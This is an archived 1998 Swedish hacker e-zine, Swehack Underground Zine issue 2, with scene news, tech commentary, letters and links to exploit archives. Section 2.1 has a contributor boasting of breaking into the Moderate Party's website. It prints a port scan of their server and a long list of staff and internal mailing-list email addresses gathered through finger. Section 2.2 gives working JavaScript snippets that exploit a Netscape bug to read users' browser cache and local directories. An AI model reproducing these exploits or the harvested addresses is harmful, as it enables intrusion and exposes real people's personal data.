OBS! Denna textfil ingår i ett arkiv som är dedikerat att bevara svensk undergroundkultur, med målsättningen att vara så heltäckande som möjligt. Flashback kan inte garantera att innehållet är korrekt, användbart eller baserat på fakta, och är inte heller ansvariga för eventuella skador som uppstår från användning av informationen.
____________________________________________________________________________ =======S====T====A====R====T=========O=====F=========F====I====L====E======= S W E H A C K U N D E R G R O U N D ______ _____ __ _ _______ ____/ | | \ | |______ /_____ __|__ | \_| |______ N U M M E R 2 ____________________________________________________________________________ I N N E H Å L L I S U Z # 2 [0.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ¤ Innehåll..............................................................0.1 ¤ Disclaimer............................................................0.2 ¤ Medarbetare...........................................................0.3 ¤ Ledare................................................................0.4 {s w e h a c k} ¤ Kanalen...............................................................1.1 ¤ Hemsidan..............................................................1.2 {h a c k i n g} ¤ Moderaternas hemsida hackad utan förvåning............................2.1 ¤ Netscape JavaScript bug...............................................2.2 ¤ www.rootshell.com hackad..............................................2.3 ¤ BUTTSniffer 0.9 ute nu................................................2.4 {ö v r i g t} ¤ Novell har nått toppen................................................3.1 ¤ Microsoft mot Linux...................................................3.2 ¤ SUN utvecklar jini....................................................3.3 ¤ Linux på frammarsch...................................................3.4 ¤ Flashback döms att betala 50.000 kr. till sexförbrytare...............3.5 ¤ Är Internet fritt?....................................................3.6 {f a s t a a v d e l n i n g a r} ¤ Frågor & svar.........................................................4.1 ¤ Insändar debatt.......................................................4.2 ¤ Svarta Börsen.........................................................4.3 - säljes - köpes - övrigt ¤ Hyperlänkar...........................................................4.4 ____________________________________________________________________________ D I S C L A I M E R [0.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ All information i denna filen är skriven i utbildnings syfte. Ni kan aldrig komma och påstå att denna filen uppmanar till brott eller något annat olag- ligt. Allt ni gör efter att ni läst något ur denna filen är helt på er egen risk och ni har själv allt ansvar för följderna. Vi avskriver oss härmed allt ansvar för era handlingar. ____________________________________________________________________________ M E D A R B E T A R E [0.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Axxezz*Denied -=- [---] dumone -=- [dum_one@hotmail.com] JÁ±CͦK¤SM̦_EÏ -=- [jacksmiley@hotmail.com] ____________________________________________________________________________ L E D A R E [0.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Så är äntligen andra numret av SUZ färdigt. Denna gången blev numret heller inte så värst stort som vi hade hoppats på. Det ligger till så att jag, Contagion, inte har alltför mycket tid till att skriva artiklar. Jag lägger redan ner en stor del av min fritid på både på att uppdatera Swehacksidan, sammanställa SUZ, hålla mig uppdaterad inom hackingvärlden och andra saker som är nödvändiga för att Swehack ska fortsätta att utvecklas positivt. Hur som helst så hoppas vi på att kunna fortsätta att ge ut åtminstone ett nummer varje månad. Det hade förstås varit roligt ifall utgivningshastig- heten hade ökat och det är även vad jag sattsar på i framtiden. Men som jag tidigare sagt så är det ytterst Ni som bestämmer om detta genom er aktivitet. Nästa nummer planeras i varje fall att inte komma ut från ungefär en månad. En del kan få problem när de läser SUZ eftersom SUZ använder en layout som bygger på att läsarna använder något s.k. monospace-typsnitt. Monospace- typsnitt är typsnitt där alla tecken är lika breda, exempel på sådana typsnitt är courier och geneve. Times är ett exempel på ett typsnitt som inte är ett monospace-typsnitt. Om ni på något sätt inte vill använda ett monospace-typsnitt när ni läser er e-mail så går det även bra att läsa SUZ på WWW. Om ni läser SUZ i notepad så fungerar det också bra. Som vanligt så ber vi er att skicka oss artiklar, nyheter, länkar, inlägg, annonser mm. för publicering i nästa nummer. Gör Ni det så kommer förhoppningsvis nästa nummer av SUZ ut som planerat, alltså någon gång i nästa månad. Tankar och idéer på vad som kan förbättras tags också tacksamt emot. Må väl! // Contagion | con@linux.nu | 98-11-17 Allt rörande SUZ kan skickas till suz@linux.nu ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< S W E H A C K >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ K A N A L E N [1.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Sedan sist har det inte hänt allt för mycket med kanalen. Den har fortsatt att vara en mötesplats för svenska hackers och det är jag glad över. Antalet personer i kanalen har i varje fall inte minskatt så det ser ljust ut. En bot planeras komma upp så småningom, när vet jag dock fortfarande inte. Swehacks IRCkanal:....................#Swehack...DALnet (irc.dal.net) ____________________________________________________________________________ H E M S I D A N [1.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Som ni säkert har sätt så har Swehacks hemsida fått ett helt nytt utseende. Sajten är numera uppdelad i färre sektioner, men varje sektion har många under sektioner så allt som allt så har sajten byggts ut. Bl.a. har SUZ fått en egen liten avdelning och i filarkivet har det tagits ett ryck. Jag hoppas att sajten numera är bättre än innan, både navigeringsmässigt, designmässigt och innehållssmässigt. Jag vet att det finns mycket som kan förbättras men det är svårt att se alla själv fel. Därför ber jag er om hjälp för att sajten ska kunna förbättras ytterligare. Skicka mig några rader med dina tankar och idéer om sidan så ska jag se vad jag kan göra för att förbättra den. Swehacks hemsida:.....................http://www.flashback.net/~mm/swehack/ http://swehack.cjb.net/ ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< H A C K I N G >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ M O D E R A T E R N A H A C K A D E [2.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Det är inte så konstigt att Moderaternas hemsida blev hackad strax innan valet. Det gjorde jag i somras, ni kan själva se hur det såg ut. Scanning host 194.198.105.25, ports 0 to 1000 Port 7 found. Desc='echo' Port 9 found. Desc='discard' Port 17 found. Desc='qotd' Port 19 found. Desc='chargen' Port 23 found. Desc='telnet' Port 21 found. Desc='ftp' Port 25 found. Desc='smtp' Port 80 found. Desc='www' Port 13 found. Desc='daytime' Port 79 found. Desc='finger' Port 110 found. Desc='pop3' Port 135 found. Port 139 found. Desc='nbsession' Port 157 found. Done! crew 98 E-mail: crew98@moderat.se A-Adresser E-mail: A-Adresser@moderat.se A-Aktiviteter E-mail: A-Aktiviteter@moderat.se A-FS E-mail: A-FS@moderat.se A-Medlemsstatistik E-mail: A-Medlemsstatistik@moderat.se A-Nomineringar E-mail: A-Nomineringar@moderat.se A-Övrigt E-mail: A-Övrigt@moderat.se A-Radio E-mail: A-Radio@moderat.se A-Val98/alla partier E-mail: "A-Val98/alla partier"@moderat.se A:E:1997:2 E-mail: "A:E:1997:2"@moderat.se A:E:1997:3 E-mail: "A:E:1997:3"@moderat.se A:E:1997:4 E-mail: "A:E:1997:4"@moderat.se AB-Debatt E-mail: AB-Debatt@moderat.se AB-DS E-mail: AB-DS@moderat.se AB-Ekonomi/Abete E-mail: "AB-Ekonomi/Abete"@moderat.se AB-Faktablad/Rapporter E-mail: "AB-Faktablad/Rapporter"@moderat.se AB-Föreningsledare E-mail: AB-Föreningsledare@moderat.se AB-Företrädare E-mail: AB-Företrädare@moderat.se AB-Information E-mail: AB-Information@moderat.se AB-Instruktioner E-mail: AB-Instruktioner@moderat.se AB-Internt E-mail: AB-Internt@moderat.se AB-ITgrupp E-mail: AB-ITgrupp@moderat.se AB-Landstinget E-mail: AB-Landstinget@moderat.se AB-Namnlista E-mail: AB-Namnlista@moderat.se AB-Övrigt E-mail: AB-Övrigt@moderat.se AB-Pressmeddelanden E-mail: AB-Pressmeddelanden@moderat.se AB-Stockholm E-mail: AB-Stockholm@moderat.se AB-Stockholms län E-mail: AB-Stockholms.län@moderat.se AB-Stockholms stad E-mail: AB-Stockholms.stad@moderat.se AB-Stockholmsdebatt E-mail: AB-Stockholmsdebatt@moderat.se AB-TipsIdåer E-mail: AB-TipsIdåer@moderat.se AB-Trafikdebatt E-mail: AB-Trafikdebatt@moderat.se AB-Valledning E-mail: AB-Valledning@moderat.se AB-Valmaterial E-mail: AB-Valmaterial@moderat.se AB-Valsedlar E-mail: AB-Valsedlar@moderat.se AB-Valstugor E-mail: AB-Valstugor@moderat.se AB-Vård/Omsorg E-mail: "AB-Vård/Omsorg"@moderat.se Anders Åberg E-mail: anders.aberg@moderat.se Dan Åberg E-mail: dan.aberg@moderat.se Mathias M.a.t. Åberg E-mail: Mathias.M.a.t..Åberg@moderat.se Mathias Åberg E-mail: Mathias.Åberg@moderat.se Ingvar Abrahamson E-mail: Ingvar.Abrahamson@moderat.se Annica Abrahamsson E-mail: Annica.Abrahamsson@moderat.se Birgitta Abrahamsson E-mail: Birgitta.Abrahamsson@moderat.se Björn Abrahamsson E-mail: Björn.Abrahamsson@moderat.se Björn K.G. Abrahamsson E-mail: Björn.K.G..Abrahamsson@moderat.se Johan Abrahamsson E-mail: Johan.Abrahamsson@moderat.se Lars Å.E. Abrahamsson E-mail: Lars.Å.E..Abrahamsson@moderat.se Maria Abrahamsson E-mail: Maria.Abrahamsson@moderat.se Telnetade till port 79 på servern. Inte smart av admin att ha port 79 öppen. ---------------------------------------------------------------------------- Skrivet av dumone | dum_one@hotmail.com ---------------------------------------------------------------------------- ____________________________________________________________________________ N E T S C A P E J A V A S C R I P T B U G [2.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Det finns en bug i Netscape Communicator under wincrap (sannerligen också under andra OS) som tillåter att läsa användarens cache. Dessa scripten fångar upp användarens sist besökta URL:er och den informationen som kan hittas i GET-formulär. Man kan även använda buggen till att läsa innehållet i lokala kataloger. For att läsa cache: <A HREF="about:<SCRIPT>while(top.cache.document.links.length==0); a=top.cache.document; s='Here are some links from your cache (do not mind about: )\n\n'; for(i=0;i<5;i++) s += a.links[i]+'\n'; alert(s);history.go(-1);</SCRIPT>"> För att läsa innehållet i lokala kataloger: sl=window.open('wysiwyg://1/about:cache'); //For Netscape 3.04 remove 'wysiwyg://1/' sl2=sl.window.open(); sl2.location="javascript:function f() {s='<SCRIPT>cr=\"\t \"; x=\"Here are some links from your cache:\"; for(i=0;i<5;i++) x+=opener.document.links[i]+cr;alert(x);</'+'SCRIPT>';return s};f()"; sl2.location.reload(); Ytteligare demonstration kan du hitta på: http://www.geocities.com/ResearchTriangle/1711/b4.html http://www.geocities.com/ResearchTriangle/1711/b5.html ---------------------------------------------------------------------------- Skrivet av JÁ±CͦK¤SM̦_EÏ | jacksmiley@hotmail.com ---------------------------------------------------------------------------- ____________________________________________________________________________ R O O T S H E L L . C O M H A C K A D [2.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ RootShell (www.rootshell.com) är en känd hacking sajt som alltid brukar ha det senaste inom system expoits och liknande. Deras arkiv över filer är väldigt stort och uppskattat av många, men tydligen inte alla. Någon/några hackade nämligen sajten och byte ut förstasidan mot en sida med text som såg ut att vara krypterad. Detta sättet att skriva har blivit en signatur för "script kiddies" och i texten kunna man finna att AntiOnline (www.antionline.com) var nästa på deras lista över framtida hack. AntiOnline och deras ISP Lazerlink har nu vidtagit åtgärder för att minimera risken att deras hemsida ska bli hackad. De har bytt alla lösenord, dubbel- kontrollerat alla sina säkerhetsprogram mm. Vi får väll se ifall AntiOnline blir hackade eller inte. Man väntar med spänning. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: AntiOnline, http://www.antionline.com/ ---------------------------------------------------------------------------- ____________________________________________________________________________ B U T T S N I F F E R 0 . 9 U T E N U [2.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ cDc's Dildog har släppt Beta 0.9 av hans "BUTTSniffer" plugin till Back Orifice. Det här verktyget låter dig söka efter nätverks aktivitet i datorer som är smittade med det redan populära programmet Back Orifice från cDc. BUTTSniffer är bara en av många officiellt släppta BO plugins. Redan släppta plugins är bl.a. Butt Trumpet, Saran Wrap, Silk Rope och Speak Easy. Både den nyaste versionen av BO och dessa plugins finns att ladda hem från cDc's egna sajt, www.cultdeadcow.com. ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu Källa: AntiOnline, http://www.antionline.com/ ---------------------------------------------------------------------------- ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< Ö V R I G T >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ N O V E L L H A R N Å T T T O P P E N [3.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Nu har det vänt för Novell. Att vara en ensam ropande röst i en allt mer Microsoft-dominerad IT-bransch tycks alltså inte vara helt omöjligt. Novell, som en gång var marknadens ledande leverantör att nätlösningar, har haft det tufft under några års tid. Det har kostat i både tid och pengar att sopa ihop vad som var kvar av företaget i spåren av Ray Noordas misslyckade försök att konkurrera med Microsoft. Med Eric Schmidt i spetsen har företaget nu emellertid återhämtat sig. Bedömare spår att Novell nu har prickat in en formtopp. Mot bakgrund av att Microsoft inte räknar med att skeppa Windows NT 5 (Windows 2000) än på ett tag har Novell ett bra utgångsläge med NetWare 5.0, till vilket det finns 400 applikationer klara. Idag har NetWare runt 80 miljoner användare. Dessutom är NetWare 5.0 klart, tillskillnad från Windows NT 5. Källkoden till NetWare är dessutom bara en fjärdedel så stor som källkoden till Windows NT 5, vilket givetvis innebär prestandavinster. Katalogtjänsten NetWare Directory Services är ett annat plus. Novells hemsida:......................http://www.novell.com/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ M I C R O S O F T M O T L I N U X [3.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Att Microsoft ogillar fria alternativ har väll de flesta känt på sig länge. Nu har det dock dykt upp mer konstruktiva bevis på att Microsoft är emot Linux och helst skulle vilja eliminera hotet. En medarbetare på Microsoft har i ett internt dokument pekat ut Linux som ett svårt hot mot Microsoft. I "The Halloween Document" diskuteras hur detta hot ska kunna detroniseras. Det konfidentiella dokumentet, som är författat av produktchefen Vinod Valloppillil, har läckt ut och publicerats på nätet av Eric S. Raymond, en person som arbetar aktivt för att främja distributionen av fria program. Raymond ser rapporten som ytterligare ett bevis på Microsofts önskan att dominera genom att bland annat skapa nya standarder för att på så sätt kväsa alternativen. Microsoft poängterar att åsikterna får stå för rapportens författare personligen och menar att uppläggning samt det aggressiva språkvalet är avsett att sporra till debatt inom företaget. Klart är att Microsoft har anledning att oroas över högkvalitativa alternativ som Linux och Apache. Strax efter att ovanstående läckt ut så läckte ytterligare ett dokument ut. I detta diskuteras det hur man ska kunna stoppa linux på rättslig väg. Det är samma författare till detta som till det första dokumentet. Han har dock haft hjälp av en annan av företagets medarbetare, Josh Cohen. I dokumentet konstaterar de att "Linux-utvecklare gärna lånar funktioner och idéer från andra produkter" och menar att man därmed skulle kunna driva upphovsrätts- och patentmässiga tvister. Konsumentgruppen CTP (Consumer Project on Technology) har reagerat starkt på dessa dokument och funderar på om det kan handla om brott mot amerikanska konkurrenslagar. Microsoft förklarar att det handlar om internt arbets- material, där enskilda medarbetares åsikter kom till tal. Vissa bedömare tror att Microsoft läckt dokumenten med flit. De skulle enligt denna teori vara ett sätt att visa världen, och domstolen som tröskar antitrustmålet mot företaget, att Microsoft visst inte är monopolistiskt, utan i högsta grad sårbart. Läs första dokumentet i sin helhet på: http://www.opensource.org/halloween.html Läs andra dokumentet i sin helhet på: http://www.opensource.org/halloween2.html Microsofts hemsida:...................http://www.microsoft.com/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ S U N U T V E C K L A R J I N I [3.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Ett förtiotal ingenjörer på Sun jobbar nu med deras nya jini ("gee-nee") som tillåter vilken som helst "computing device" att bli ansluten med ett nätverk. Detta betyder att en kylskåp producent (t.ex. http://www.whirepoolcorp.com) kan använda jini till att köra "remote" diagnostik och reparationer. Så vad fan betyder detta? Inget annat än att det hade varit kul och hacka min grannes kylskåp... ---------------------------------------------------------------------------- Skrivet av JÁ±CͦK¤SM̦_EÏ | jacksmiley@hotmail.com ---------------------------------------------------------------------------- ____________________________________________________________________________ L I N U X P Å F R A M M A R S C H [3.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Intel och Netscape meddelar att man går in i Red Hat Software. Detta innebär att Linux kommer närmare Windows NT i konkurrensen om de stora användarna. Framförallt samarbetet med Intel kan innebära ett språng framåt för Linux eftersom det då kan finnas nya versioner färdiga från Red Hat samtidigt som Intel släpper sina nya produkter. Hitintills har inte Red Hat vetat vad Intels nya produkter skulle bli men i och med samarbetet så kan de få lite förhandsinformation. Även Oracle, Informix, Commputer Associates, Sybase och IBM har meddelat att de kommer att stödja Red Hats Linux OS. Även Compaq har lovat att stödja Linux genom att de kommer testa alla sina modeller för Linux. De utlovar även telefonsupport på Linux. Hos Netscape, som för övrigt haft sin högsta omsättning någonsin under det tredje kvartalet, tror man att Linux kommer att spridas snabbare bland professionella användare än vad Windows NT kommer att göra. Låt oss hålla tummarna för att Netscape ska ha rätt! Red Hats hemsida:.....................http://www.redhat.com/ Intels hemsida:.......................http://www.intel.com/ Netscapes hemsida:....................http://www.netscape.com/ Compaqs hemsida:......................http://www.compaq.com/ ---------------------------------------------------------------------------- Skrivet av Contagion | con@linux.nu ---------------------------------------------------------------------------- ____________________________________________________________________________ F L A S H B A C K S T Ä M M S [3.5] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Flashback publ. 1995 en artikel kallad 'Stockholms våldtäktsmän 1990/91'. Stockholms dömda sexförbrytare visades upp med namn, bild, personnummer, adress och telefonnummer. Där fanns också information om vilken typ av sexbrott personerna är dömda för, en kort beskrivning av brottet, vilket straff som utdömts samt målnummer i rätten. En av männen anmälde tidningens ansvarige utgivare Jan Axelsson med krav på fängelse för grovt förtal. Personen är tidigare dömd för sexuellt utnytt- jande och sexuellt ofredande av tre utvecklingsstörda flickor. Av Jan Axelsson krävde han en halv miljon kronor i skadestånd för psykiskt lidande. När en tryckfrihetsjury prövade målet i slutet av oktober fälldes Jan Axelsson - men inte för "grovt förtal" utan för "förtal". Det är anledningen till att Jan Axelsson friades från åtalet. Stockholms tingsrätt var förhindrad att fälla Jan Axelsson eftersom tryckfrihetsjuryn frångått den ursprungliga brottsrubriceringen. Däremot anser tingsrätten att mannen bör ha rätt till skadestånd. Skadeståndet bestämdes till 50 000 kronor. Jan Axelsson advokat, Nils Hillert, är mycket förvånad över tingsrättens dom. - Även om man i likhet med tingsrätten skulle mena att det inte varit för- svarligt att publicera uppgifterna är skadeståndet anmärkningsvärt högt i jämförelse med tidigare praxis. Jag har inte sett något tidigare fall där ett så högt skadestånd dömts ut för förtal av normalgraden. Tvärtom brukar inte ens grovt förtal föranleda så höga skadestånd som detta. - I praktiken har tingsrätten, som är bunden av juryns frikännande från grovt förtal och därför endast kunnat döma för förtal, på detta sätt ändå ekonomiskt straffat Jan Axelsson för grovt förtal. Det lidande publicer- ingen medfört för mannen har av tingsrätten värderats mer än dubbelt så högt som lidandet för de flickor mannen tidigare dömdes för att ha ofredat sexuellt. Detta sänder ut helt fel signaler i samhället. Sexförbrytaren jublar över domen Expressen skriver att den dömde sexförbrytaren jublade när han tog del av domen i eftermiddags. - Han känner glädje nu, säger mannens juridiska ombud till Expressen, och menar att detta är en seger för den personliga integriteten. - Men med tanke på att brottsrubriceringen ändrades från "grovt förtal" till "förtal" av tryckfrihetsjuryn i förra månaden är skadeståndet ovanligt bra, fortsätter hans advokat. - Inte minst om man tänker på att tidningen Flashbacks upplaga var bara 1200 exemplar när publiceringen skedde för tre år sedan. Flashback kommer att överklaga domen. Flashbacks hemsida:...................http://www.flashback.se/ ---------------------------------------------------------------------------- Saxat av Contagion | con@linux.nu Källa: Flashback, http://www.flashback.se/ ---------------------------------------------------------------------------- ____________________________________________________________________________ Ä R I N T E R N E T F R I T T ? [3.6] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Internet kan snart inte längre betraktas som fritt. Inte nog med att hela världens ISP:s sakta höjer priset på sina abonnemang och kostnader. Det finns massa usla människor sk. spammers också. Nu ska vi inte ens kunna skicka e-mail utan att bli bevakade av myndigheter ock dylikt. I oktober kommer lagen SORM-2 att träda i kraft i Ryssland. Den innebär att FSB (gamla KGB), genom att digitalt länka sina kontor med landets alla ISP:s, kommer att kunna läsa varenda e-mail som skickas genom dessa ISP:s. Enligt "Internet Magazine" kommer detta att innebära färre ISP:s och högre Internet kostnader. Hur länge dröjer det innan Microsoft bevakar hotmail? Kommer vi hackers att kunna kommunicera genom e-mail? (Öhh...kan vi verkligen det?...tror inte det. [anm. red]) ---------------------------------------------------------------------------- Skrivet av Axxezz*Denied Källa: Bovens Tidning ---------------------------------------------------------------------------- ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ <-------------------------<--<<---<<<--->>>--->>-->------------------------> <-------------------------< F A S T A >------------------------> <-------------------------< A V D E L N I N G A R >------------------------> <-------------------------<--<<---<<<--->>>--->>-->------------------------> ____________________________________________________________________________ F R Å G O R & S V A R [4.1] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ---------------------------------------------------------------------------- FRÅGA: Hur ändrar man Windows utseende? Av: NetAck ---------------------------------------------------------------------------- Jag vet att det går att ändra Windows 95s utseende vid avsluta rutan. Rutan jag menar är den som poppar upp då man trycker Start - Avsluta... . Det finns 3 eller 4 alternativ i den och jag vet att texten för varje alternativ går att ändra. Jag vill samtidigt passa på att fråga hur man ändrar övrigt utseende på startmenyn så som t.ex. själva knappens text "Start". Allt ska ske utan några program. //NetAck ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ____________________________________________________________________________ I N N S Ä N D A R D E B A T T [4.2] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ---------------------------------------------------------------------------- RE: Nuking - Fjortisarnas enda vapen Av: Knash^ ---------------------------------------------------------------------------- Satan vad jag håller på Slimey om hans insändare om "Nuking - Fjortisarnas enda vapen". Nuking och DoS över huvudtaget grymt lamt. Så du som har nukat mig säg vem du är och var du bor så att jag kan banka ner dig ! //Knash^ ---------------------------------------------------------------------------- Är Hotmail bättre än Internet Explorer?? Av: Contagion ---------------------------------------------------------------------------- Tjena!! Nu känner jag att jag behöver skriva lite till alla er som tror ni är några hackers bara för att ni tar avstånd från Micro$oft Internet Explorer och övriga Micro$otfs produkter. Ni säger typ "Jag dör hellre än att jag stödjer Micro$oft!". Ni säger även att Swehacks hemsida är skit lam eftersom den är (eller var) optimerad i MSIE. En hacking relaterad hemsida kan enligt er inte vara det. Själv brukar jag kolla på det informativa innehållet när jag bedömer om det är en "hackingsida" eller inte. I varje fall så kan ni en minut efter ert förtal mot Micro$oft, fråga om det är mer än ni som har problem med att logga in på Hotmail. Hotmail ägs ju av Micro$oft så jag fattar inte hur ni kan använda den tjänsten. Och dessutom är Micro$oft så fula att de länkar en till deras hemsida när man loggar ut. Detta är ju givetvis bra för statistiken över hur många besökare deras sida har haft och eftersom det är väldigt många som använder Hotmail så gynnas Micro$oft på ett orättvist sätt. Tillskillnad från Internet Explorer så finns det bra alternativ för Hotmail som t.ex. AltaVistas- eller MyOwnEmails email-tjänst. Detta tycker jag visar att det är lamare att använda Hotmail än vad det är att göra en websida optimerad för Internet Explorer. Så varför kan vi inte alla sluta, dels att förtala IE-optimerade sidor, dels att använda Hotmail? Tänk på att varje gång Du utnyttjar Hotmail så främjar och stödjer du Micro$oft och därmed indirekt djävulen själv, Bill Gates... //Contagion ---------------------------------------------------------------------------- Kalla mig inte lamer! Av: Knash^ ---------------------------------------------------------------------------- Tja! Jag tänkte klaga lite på dom som klagar på mig att jag [Knash^] är en Lamer. Jag är Newbie men inte Lamer!! En lamer är en person som sysslar med massa Denial Of Service program och bryter sig in i datorer med hjälp av program som andra gjort. Syftet med insändaren är att det finns Newbies som inte är lamers. //Knash^ ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ____________________________________________________________________________ S V A R T A B Ö R S E N [4.3] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ __________________________________________________________________________ | | | | S Ä L J E S | K Ö P E S | |____________________________________|_____________________________________| | | | | Här skulle egentligen annonser | Jag vill köpa tomma psx skivor | | publicerats men när det nu inte | (svarta). | | kommit in några så tar jag till- | /henke <henrik666@hotmail.com> | | fället i akt att höra med er om |_____________________________________| | ni tycker denna avdelningen är | | | onödig eller ej. Ni bestämmer, | Säg vad du tycker i ett e-mail | | ska avdelningen bort eller ej? | till <suz@linux.nu>. | |____________________________________|_____________________________________| ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ____________________________________________________________________________ H Y P E R L Ä N K A R [4.4] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ http://oliver.efri.hr/~crv/security/bugs/ Fräsha buggar och exploits till de flesta system. Mycket bra uppdaterat och antalet filer är inte att klaga på. Det enda man skulle kunna klaga på är att servern är väldigt slö. http://www.hut.fi/Misc/Electronics/ Det mesta som är elektronik relaterat kan du hitta här. Riktigt bra. ____________________________________________________________________________ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ____________________________________________________________________________ __ _____ / _\ _ _ / _ / Redaktör: Contagion | con@linux.nu \ \ | | | | \// / _\ \ | |_| |_ / //\_ Hemsida: http://swehack.cjb.net \__/(_)__,_(_)____(_) IRC: #Swehack @ DALnet Börja att prenumerera på Swehack Underground Zine genom att skicka ett e-mail med SUZ som ämne (subject) till suz@linux.nu ____________________________________________________________________________ ____________________________________________________________________________ =========E====N====D============O=====F============F====I====L====E=========